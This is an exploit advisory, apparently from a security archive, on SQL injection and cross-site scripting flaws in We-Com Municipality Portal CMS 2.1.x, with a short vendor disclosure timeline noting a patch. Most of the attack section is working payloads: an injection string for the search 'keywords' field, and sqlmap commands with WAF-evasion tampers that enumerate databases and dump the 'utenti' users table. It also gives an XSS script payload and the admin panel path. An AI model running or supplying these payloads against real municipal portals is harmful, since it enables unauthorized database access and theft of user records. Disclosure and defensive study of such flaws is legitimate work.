We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection: Posted Jun 1, 2020; Authored by thelastvvv; We-Com Municipality Portal CMS version 2.1.x suffers from cross site scripting and remote SQL injection vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | a064044ce2e55681ca97b669a47fa9de5d0ab2d078912b3da970309428b6ac64; Download | Favorite | View

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

# Exploit Title: We-com Municipality portal CMS SQL Injection & XSS Vulnerability
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.1.x
# Tested on: 5.5.0-kali1-amd64

---------------------------------------------------------


Vendor contact timeline:


2020-05-05: Contacting vendor through  info@we-com.it
2020-05-26: A Patch is published in the versions
2020-06-01: Release of security advisory




PoC 1:
The attacker once locate the sql vulnerability in the "keywords" parameter of the portal search bar then the attacker  will be able to  perform an automated process to exploit the secruity  of Italien Municipality portal CMS 
Payload(s)

http://www.site.it/cerca/
POST Data: keywords='1'--

SQLMAP Payload(s):


sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D **_db --tables

sqlmap -u https://www.comune.site.it/cerca/ --data "keywords=" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D **_db -T utenti


PoC 2 :

XSS Vulnerability

Payload(s) :
http://www.site.com/cerca/ 
in the search bar:
'"<script>alert(1);</script>%



Admin panel:

www.site.it/admin/

Top Authors In Last 30 Days

Red Hat 233 files
Ubuntu 87 files
Gentoo 31 files
Debian 20 files
tmrswrr 9 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Jerry Thomas 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,081)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,414)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,315)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,668)
UNIX (9,427)
UnixWare (187)
Windows (6,666)
Other

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

Share This

We-Com Municipality Portal CMS 2.1.x Cross Site Scripting / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems